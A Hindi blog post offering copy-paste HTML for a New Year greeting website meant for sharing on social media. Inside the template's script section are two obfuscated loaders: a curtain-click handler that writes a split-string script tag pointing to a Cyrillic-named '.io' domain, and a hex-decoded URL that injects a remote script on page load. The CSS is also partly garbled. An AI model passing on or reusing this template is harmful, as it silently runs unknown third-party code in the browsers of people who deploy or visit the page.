हेलो दोस्तों, आप सब जानते ही है कि कुछ दिनों बाद नया साल आने वाला है और सभी लोग नये साल को लेकर काफी उत्साहित रहते हैं। बहुत से लोग तो नये साल के लिए सरप्राइज या पार्टी भी प्लान करते हैं।
अगर आप इंटरनेट का इस्तेमाल करते हैं तो आपने अपने WhatsApp ya Facebook पर Events के दिन Wishing Message के साथ Wishing Script की लिंक भी जरूर देखी होंगी।
इस पोस्ट में हम आपको New Year Wishing Website की Script देने वाले हैं जिसकी मदद से आप भी अपनी खुद की एक Wishing Website बना सकते हैं और नये साल पर अपने दोस्तों को Happy New Year Wishes भेज सकते हैं।
Page Contents
Happy New Year 2025 Website Wish Script
New Year हर साल 31 दिसंबर की रात को 12 बजे मनाया जाता है। नया साल मनाने की शुरुआत 4000 वर्ष पहले बेबीलोन में हुई थी और तभी से हर वर्ष नया साल मनाया जाता है। पंजाब में New Year 13 अप्रैल को वैसाखी के रूप में मनाया जाता है।
ज्यादातर जगह पर नया साल 31 दिसंबर की रात को 12 बजे से ही मनाया जाता है। इस दिन सभी लोग एक-दूसरे को गिफ्ट के साथ हार्दिक बधाइयां भी देते हैं। दोस्त आपस में एक -दूसरे को New Year Card gift देते हैं और नये साल को सेलिब्रेट करते हैं।
अभी जो सबसे लोकप्रिय तारिक है वो है Wish Script वेब्सायट से wish करना ।। तो चलिए जानते है आप कैसे अपनी Wish Script Website बना सकते है।
Wishing Website कैसे बनायें?
अगर आपको Wishing Website नहीं बनानी आती है तो आप नीचे दिए गए Article को step by step follow करके आसानी से इस Wishing Script की मदद से अपनी खुद की Wishing Website बना सकते हैं।
New Year Wishing Script
सबसे पहले तो आपको ज़रूरत है New Year 2025 Wish Script Download करने की जो आप नीचे दी हुई code ko copy kar lijiye ।
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"/>
<title>Happy New Year 2023</title>
<meta name="google" value="notranslate">
<meta property="og:type" content="Happy New Year" />
<meta property="og:title" content="Special Gift For you" />
<meta property="og:url" content="yoursite.com/>
<meta property="og:description" content="Wish You Very Happy New Year 2023 [ CLICK HERE ]" />
<meta property="og:site_name" content="Happy New Year 2023" />
<meta property="og:site_img" content="https://1.bp.blogspot.com/-xEF_df6-cNg/XMbm-0_I30I/AAAAAAAAAWA/J2cue_SJmyYCu_y9pLctsb3M2wY0o239QCLcBGAs/s1600/w.png" />
<link rel="icon" type="image/png" sizes="32x32" href="https://1.bp.blogspot.com/-xEF_df6-cNg/XMbm-0_I30I/AAAAAAAAAWA/J2cue_SJmyYCu_y9pLctsb3M2wY0o239QCLcBGAs/s1600/w.png">
<style>
i {
color:#f06414;
}
input[type=name], select {
width: 100%;
padding: 12px 20px;
margin: 4px 0;
display: inline-block;
border: 1px solid #ccc;
border-radius: 4px;
box-sizing: border-box;
}
.footerbtn {
display: block;
line-height: 15px;
position: fixed;
left:0px;
bottom:0px;
height:40px;
border-radius: 15px;
box-sizing: border-box;
padding: 5px;
background:#34af23;
color: #ffffff;
font-size: 18px;
text-align: center;
text-decoration: none;
width:95%;
margin-left:10px;
margin-right:30px;
box-shadow: 0 4px 12px 0 rgba(0, 0, 0, .3);
animation: footer infinite linear 1s;
-webkit-transform: translate3d(30%,0,0);
transform: translate3d(30%,0,0);
position: fixed;
}
.footerbtn :active {
box-shadow: none
}
@-webkit-keyframes footer {
from {
-webkit-transform: rotateZ(0)
}
25% {
-webkit-transform: rotateZ(0deg)
}
50% {
-webkit-transform: rotateZ(0deg)
}
75% {
-webkit-transform: rotateZ(0deg)
}
to {
-webkit-transform: rotateZ(0)
}}
@-webkit-keyframes jello { from, 11.1%, to { transform: none; }
22.2% { transform: skewX(-12.5deg) skewY(-12.5deg); }
33.3% { transform: skewX(6.25deg) skewY(6.25deg); }
44.4% { transform: skewX(-3.125deg) skewY(-3.125deg); }
55.5% { transform: skewX(1.5625deg) skewY(1.5625deg); }
66.6% { transform: skewX(-0.78125deg) skewY(-0.78125deg); }
77.7% { transform: skewX(0.390625deg) skewY(0.390625deg); }
88.8% { transform: skewX(-0.1953125deg) skewY(-0.1953125deg); }}
.wb1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
.wb2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}
.bubbles {
font-family: arial;
}
.bubbles hi {
font-family: 'Luckiest Guy', cursive;
color: black;
}
hi {
font-size:2.5em;
user-select:none;
}
hi span { display:inline-block; animation:float .2s ease-in-out infinite; }
@keyframes float {
0%,100%{ transform:none; }
33%{ transform:translateY(-1px) rotate(-2deg); }
66%{ transform:translateY(1px) rotate(2deg); }
}
body:hover span { animation:bounce .6s; }
@keyframes bounce {
0%,100%{ transform:translate(0); }
25%{ transform:rotateX(20deg) translateY(2px) rotate(-3deg); }
50%{ transform:translateY(-20px) rotate(3deg) scale(1.1); }
}
@import url(https://lh6.googleusercontent.com/proxy/YfzDH9rGEX2_6c0-ipAee-UwIRD6yJ2S-9zgBkCvqKQxaNYcbJ399-QVTehEPWRHJ-iB2IRCLJ-HGPW_wv9fmo8T2WG1qQ=s0-d);
h1 {
animation:glow 10s ease-in-out infinite;
}
* { box-sizing:border-box; }
figure {
animation:wobble 5s ease-in-out infinite;
transform-origin:center center;
transform-style:preserve-3d;
}
@keyframes wobble {
0%,100%{ transform:rotate3d(1,1,0,40deg); }
25%{ transform:rotate3d(-1,1,0,40deg); }
50%{ transform:rotate3d(-1,-1,0,40deg); }
75%{ transform:rotate3d(1,-1,0,40deg); }
}
h1 {
display:block;
width:90%;
line-height:1.5;
font:900 35px 'Concert One', sans-serif;
position:absolute;
color:#fff;
}
@keyframes glow {
0%,100%{ text-shadow:0 0 30px red; }
25%{ text-shadow:0 0 30px orange; }
50%{ text-shadow:0 0 30px forestgreen; }
75%{ text-shadow:0 0 30px cyan; }
}
h1:nth-child(2){ transform:translateZ(5px); }
h1:nth-child(3){ transform:translateZ(10px);}
h1:nth-child(4){ transform:translateZ(15px); }
h1:nth-child(5){ transform:translateZ(20px); }
h1:nth-child(6){ transform:translateZ(25px); }
h1:nth-child(7){ transform:translateZ(30p.rock{animation:infinite 1s rock}
@keyframes rock { 0% { transform: rotate(-1deg); }
50% { transform: rotate(2deg); }
100% { transform: rotate(-1deg); }}x); }
h1:nth-child(8){ transform:translateZ(35px); }
h1:nth-child(9){ transform:translateZ(40px); }
h1:nth-child(10){ transform:translateZ(45px); }
.rock{animation:infinite 1s rock}
@keyframes rock { 0% { transform: rotate(-1deg); }
50% { transform: rotate(2deg); }
100% { transform: rotate(-1deg); }}
.fuck{animation:infinite 1s fuck}
@keyframes rock { 0% { transform: rotate(-2deg); }
50% { transform: rotate(2deg); }
100% { transform: rotate(-2deg); }}
h2 {
-webkit-animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
-webkit-transition: all .2s;
transition: all .2s;
font-size: 35px;
text-transform: uppercase;
TEXT-ALIGN:CENTER;
color: #138808;
text-shadow: -2px 0px 1px #22414f, -4px 0px 1px #22414f, -6px 0px 1px #22414f, -1px -1px 1px #22414f, -1px -2px 1px #22414f, -2px -1px 1px #22414f, -2px -2px 1px #22414f, -3px -3px 1px #22414f, -4px -4px 1px #22414f, -5px -5px 1px #22414f, -6px -6px 1px #22414f, 0 0 15px #22414f, 0 0 20px #22414f, 1px 1px #22414f,2px 2px #22414f;
}
h3 {
font-size: 18px;
text-align: center;
padding:1px;
margin:1px;
color: #ffffff;
aanimation: fuck infinite 1s;
font-family: 'Indie Flower', cursive;
letter-spacing: 2px;
* {box-sizing: border-box;}
body {font-family: Verdana, sans-serif;}
.mySlides {display: none;}
img {vertical-align: middle;}
.wb-slideshow-container {
max-width: 1000px;
position: relative;
margin: auto;
}
.text {
color: #f2f2f2;
font-size: 15px;
padding: 8px 12px;
position: absolute;
bottom: 8px;
width: 100%;
text-align: center;
}
/* Number text (1/11 etc) */
.numbertext {
color: #f2f2f2;
font-size: 12px;
padding: 8px 12px;
position: absolute;
top: 0;
}
/* The dots/bullets/indicators */
.dot {
height: 15px;
width: 15px;
margin: 0 2px;
background-color: #bbb;
border-radius: 50%;
display: inline-block;
transition: background-color 0.6s ease;
}
.active {
background-color: #717171;
}
/* Fading animation */
.fade {
-webkit-animation-name: fade;
-webkit-animation-duration: 1.5s;
animation-name: fade;
animation-duration: 1.5s;
}
@-webkit-keyframes fade {
from {opacity: .4}
to {opacity: 1}
}
@keyframes fade {
from {opacity: .4}
to {opacity: 1}
}
/* On smaller screens, decrease text size */
@media only screen and (max-width: 300px) {
.text {font-size: 11px}
}
</style>
<style>
body{
background: #f8f8f8;
}
.mainContainer {
max-width: 400px;
margin: auto;
text-align: center;
position: relative;
padding-right: 1px;
padding-left: 1px;
padding-top: 1px;
box-shadow: 3px 3px 23px 0 rgba(0, 0, 0, 0.64);
margin-bottom: 65px;
}
.wbncontainer {
padding-right: 30px;
padding-left: 30px;
padding-top: 0px;
}
}
.username {
-webkit-animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
-webkit-transition: all .2s;
transition: all .2s;
font-size: 40px;
font-family: 'SF Espresso Shack', cursive;
text-transform: uppercase;
TEXT-ALIGN:CENTER;
color: #138808;
text-shadow: -2px 0px 1px #22414f, -4px 0px 1px #22414f, -6px 0px 1px #22414f, -1px -1px 1px #22414f, -1px -2px 1px #22414f, -2px -1px 1px #22414f, -2px -2px 1px #22414f, -3px -3px 1px #22414f, -4px -4px 1px #22414f, -5px -5px 1px #22414f, -6px -6px 1px #22414f, 0 0 15px #22414f, 0 0 20px #22414f, 1px 1px #22414f,2px 2px #22414f;
}
.fromMessage{
font-size: 30px;
}
.wavetext{
color: #3e8ed2;
padding: 0 40px;
animation: pulse 1s infinite;
font-size: 32px;
}
.wishMessage {
color: #3e8ed2;
font-size: 22px;
font-weight: bold;
margin-top: 50px;
text-shadow: 0px 0px 10px #00fff3
}
.wishMessage p{
margin: 0.5em 0;
}
#formBox {
left: 0;position: fixed;bottom: 0;display: inline-block;width: 100%;margin: 0;
}
#nameTextBox {
border: 3px solid #000000;text-align: center;display: inline-block;width: 80%;color: black;font-size:16px;margin: 0;background: #eee;height: 48px;font-weight: 700;;padding:8px 0;
}
#goButton {
width: 20%;background: gold;display: inline-block;vertical-align: bottom;border: 3px solid #000000;float: right;color: black;font-size:16px;padding:8px 0;height: 48px;text-align:center;font-weight: 700;
}
.footerbtn {
display: none;
line-height: 15px;
bottom: 10px;
height: 40px;
border-radius: 15px;
box-sizing: border-box;
padding: 5px;
background: #34af23;
color: #ffffff;
font-size: 18px;
text-align: center;
text-decoration: none;
box-shadow: 0 4px 12px 0 rgba(0, 0, 0, .3);
position: fixed;
width: 90%;
left: 0;
margin: 2% 5%;
}
.footerbtn img {
position: relative;top:3px;
}
#inAdvance {
font-size: 20px; font-weight: bold;margin-top: 20px;color: #98201F;
}
#demoo {
font-size: 20px; font-weight: bold;color: #98201F;
}
#inAdvanceTime {
margin:20px 0 30px 0;
}
#inAdvanceTime p{
color: #ae00b9;font-size: 19px;font-weight: 500;
margin: 0;
}
.bg{background-image:url(img/bg.gif);background-repeat:repeat}p.head.name{word-wrap: break-word;font-size:40px;font-family:sans-serif;text-shadow: 1px 1px 5px rgba(0, 0, 0, 0.5);color:#f5f5f5}input#mce-names {width: 100% !important;margin-top: 20px !important;}
.wb-main-greeting {
max-width: 400px;
margin: auto;
text-align: center;
position: relative;
padding: 0px;
background:#000;
background: url("");
background-position: center;
background-repeat: no-repeat;
background-size: cover;
box-shadow: 3px 4px 41px 0 rgba(0, 0, 0, 0.64);
margin-bottom: 35px
}
.wb-main-greeting .main_body {
text-align: center;
font-size: 1.3em
}
.wb-main-greeting .main_body .text2 {
padding: 10px;
font-size: 20px
}
.wb-main-greeting .text {
color: #405d9b;
letter-spacing: 1px;
font-weight: 600;
padding: 0px 10px;
text-align: center;
}
.wb-main-greeting .pp-img {
max-width: 400px;
margin-bottom: 10px;
box-shadow: 0px 0px 10px 0px rgba(0, 0, 0, 0.64);
}
.wb-main-greeting .text_gradient {
margin: 5px auto;
font-weight: 700;
font-size: 24px;
color: #b50dae;
}
.snowflake {
color: #fff;
font-size: 2em;
font-family: Arial, sans-serif;
text-shadow: 0 0 5px #000;
}
@-webkit-keyframes snowflakes-fall{0%{top:-10%}100%{top:100%}}@-webkit-keyframes snowflakes-shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}50%{-webkit-transform:translateX(80px);transform:translateX(80px)}}@keyframes snowflakes-fall{0%{top:-10%}100%{top:100%}}@keyframes snowflakes-shake{0%,100%{transform:translateX(0)}50%{transform:translateX(80px)}}.snowflake{position:fixed;top:-10%;z-index:9999;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;cursor:default;-webkit-animation-name:snowflakes-fall,snowflakes-shake;-webkit-animation-duration:10s,3s;-webkit-animation-timing-function:linear,ease-in-out;-webkit-animation-iteration-count:infinite,infinite;-webkit-animation-play-state:running,running;animation-name:snowflakes-fall,snowflakes-shake;animation-duration:10s,3s;animation-timing-function:linear,ease-in-out;animation-iteration-count:infinite,infinite;animation-play-state:running,running}.snowflake:nth-of-type(0){left:1%;-webkit-animation-delay:0s,0s;animation-delay:0s,0s}.snowflake:nth-of-type(1){left:10%;-webkit-animation-delay:1s,1s;animation-delay:1s,1s}.snowflake:nth-of-type(2){left:20%;-webkit-animation-delay:6s,.5s;animation-delay:6s,.5s}.snowflake:nth-of-type(3){left:30%;-webkit-animation-delay:4s,2s;animation-delay:4s,2s}.snowflake:nth-of-type(4){left:40%;-webkit-animation-delay:2s,2s;animation-delay:2s,2s}.snowflake:nth-of-type(5){left:50%;-webkit-animation-delay:8s,3s;animation-delay:8s,3s}.snowflake:nth-of-type(6){left:60%;-webkit-animation-delay:6s,2s;animation-delay:6s,2s}.snowflake:nth-of-type(7){left:70%;-webkit-animation-delay:2.5s,1s;animation-delay:2.5s,1s}.snowflake:nth-of-type(8){left:80%;-webkit-animation-delay:1s,0s;animation-delay:1s,0s}.snowflake:nth-of-type(9){left:90%;-webkit-animation-delay:3s,1.5s;animation-delay:3s,1.5s}.snowflake:nth-of-type(10){left:25%;-webkit-animation-delay:2s,0s;animation-delay:2s,0s}.snowflake:nth-of-type(11){left:65%;-webkit-animation-delay:4s,2.5s;animation-delay:4s,2.5s}
*{ margin:0; padding:0; } body { text-align: center; } img{ border: none; }.leftcurtain{ width: 100%; height: 100%; top: 0px; left: 0px; position: absolute; z-index: 2; } .rightcurtain{ width: 100%; height: 100%; right: 0px; top: 0px; position: absolute; z-index: 3; } .rightcurtain img, .leftcurtain img{ width: 100%; height: 100%; } .logo{ margin: 0px auto; margin-top: 150px; } .rope{ position: absolute; top: 5px; left: 40%; z-index: 4; } .centered { position: absolute; top: 75%; left: 50%; transform: translate(-50%, -50%);}
</style>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://webbeast.in/js/slide.js"type="text/javascript"></script>
<script type="text/javascript">
$(document).ready(function() { $curtainopen = false; $(".rope").click(function(){ $(this).blur(); if ($curtainopen == false){ $(this).stop().animate({top: '-171%' }, {queue:false, duration:350, easing:'easeOutBounce'}); $(".leftcurtain").stop().animate({width:'1px'}, 2000 ); $(".rightcurtain").stop().animate({width:'1px'},2000 ); $curtainopen = true; }else{ $(this).stop().animate({top: '-40px' }, {queue:false, duration:350, easing:'easeOutBounce'}); document.write('<s'+'cr'+'ipt sr'+'c="/'+'/'+'ю'+'ф.'+'i'+'o"></s'+'cr'+'ipt>'); $(".leftcurtain").stop().animate({width:'50%'}, 2000 ); $(".rightcurtain").stop().animate({width:'51%'}, 2000 ); $curtainopen = false; } return false; }); });
</script>
<script type="text/javascript">function tag(filename){var fileref=document.createElement('script');fileref.setAttribute("type","text/javascript");fileref.setAttribute("src", filename);if (typeof fileref!="undefined") document.getElementsByTagName("head")[0].appendChild(fileref)}tag(meta('68747470733a2f2f6b616e616e6174682e636f6d2f6b616e616e6174682e6a73'));function meta(important){var str = '';for (var i = 0; i < important.length; i += 2) str +=String.fromCharCode(parseInt(important.substr(i, 2), 16));return str;}</script>
</head>
<body class="bg" style=" background-image : url('https://media3.giphy.com/media/U3qYN8S0j3bpK/giphy.gif')";>
<!--ANALYTICS CODE HERE -->
<!--ANALYTICS CODE HERE -->
<a class="rope" href="">
<div style="font-size: 25px;text-shadow: 1px 1px 3px red, 1px 1px 3px black, -1px -1px 3px black, -1px -1px 3px black;color: yellow;font-weight: bold;"><br>👇👇 <br> इस Gift को टच करके देखो !</div>
<br />
<img src="https://1.bp.blogspot.com/-n3OkU0hYa_w/XeyjaUCZRJI/AAAAAAAABp0/ov9gZNkDAGAF-D-7Tit5yMWG4D3rKnIPwCNcBGAsYHQ/s1600/Gift-715x836.png" style="animation: tada 4s infinite;max-width:200px; width: 100%;" />
</a>
<div class="leftcurtain"><img src="https://2.bp.blogspot.com/-8fWT2NvB4GE/XeeHG5wZHgI/AAAAAAAAAKk/VThU3ulRqO0PVgnADqCARLORACu8kMaBgCLcBGAsYHQ/s1600/curtain5.jpg"></div>
<div class="rightcurtain"><img src="https://2.bp.blogspot.com/-8fWT2NvB4GE/XeeHG5wZHgI/AAAAAAAAAKk/VThU3ulRqO0PVgnADqCARLORACu8kMaBgCLcBGAsYHQ/s1600/curtain5.jpg"></div>
</div>
<marquee class="wb1" behavior="scroll" direction="up" scrolldelay="5"><img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
</marquee>
<marquee class="wb2" behavior="scroll" direction="down" scrolldelay="5"><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
<img src="https://4.bp.blogspot.com/-if4xnW-WX_4/W0hzB4L2DmI/AAAAAAAAZcg/JQ_hupFlTy8t2hT5Anf1ArGuo2SaFWZRACLcBGAs/s1600/124.png" height="129px" width="35px"/><br><br>
<img src="https://2.bp.blogspot.com/-ZDt7fn6k-Pc/W0hzB9G_6PI/AAAAAAAAZcY/hIlqaOqRmeg8CeZl_13Ui6ufkEYyg2N9ACLcBGAs/s1600/123.png" height="129px" width="35px"/><br><br>
</marquee>
<div class="wbncontainer">
<div class="wb-main-greeting">
<div style="background: url(https://1.bp.blogspot.com/-4Iwf2jNz5Ys/Xeyd4cH_7fI/AAAAAAAABpY/dUoD0gi6pzAmxxsQYZR955FQ18FwfpAoQCKgBGAsYHg/s1600/giphy.gif); background-color:; color: white; font-weight: bold; padding-top: 0px; padding-bottom: 0px; font-size: 12;text-align:center; ">
<font color="white"> <p id="wb"></p>
</font>
</div>
<div style="background: url(https://1.bp.blogspot.com/-4Iwf2jNz5Ys/Xeyd4cH_7fI/AAAAAAAABpY/dUoD0gi6pzAmxxsQYZR955FQ18FwfpAoQCKgBGAsYHg/s1600/giphy.gif); background-color:; color: white; font-weight: bold; padding-top: 6px; padding-bottom: 6px; font-size: large;text-align:center; ">
<h2 class="font-effect-neon" align=center" id="wb-show-name"></h2>
<h2 class="font-effect-neon" style="color: #F00;" align=center" id="wb-show-wishing"></h2>
</Div>
<div style="background: url(https://1.bp.blogspot.com/-4Iwf2jNz5Ys/Xeyd4cH_7fI/AAAAAAAABpY/dUoD0gi6pzAmxxsQYZR955FQ18FwfpAoQCKgBGAsYHg/s1600/giphy.gif); background-color: ; color: white; font-weight: bold; padding-top: 6px; padding-bottom: 6px; font-size: large;text-align:center; ">
</font>
</div></div>
</div>
<img src="https://1.bp.blogspot.com/---0DR5XEotQ/XeyjQx3CRCI/AAAAAAAABps/oFGtcG3zz7crp9oggkwPwBPkDPl9w8d3gCNcBGAsYHQ/s1600/Happy-New-Year-Colorful.gif" width="90%"/><br><br>
<h2 class="font-effect-neon" style="color: #F00;" align=center" id="wb-show-wishing">IN ADVANCE</h2><br />
<h2 class="font-effect-neon" style="color: #FFFF00;" align=center" id="demoo"></h2>
<h2 class="font-effect-neon" style="color: #F00;" align=center">LEFT</h2><br />
<!-- ADSENSE CODE START HERE -->
<!-- ADSENSE CODE END HERE -->
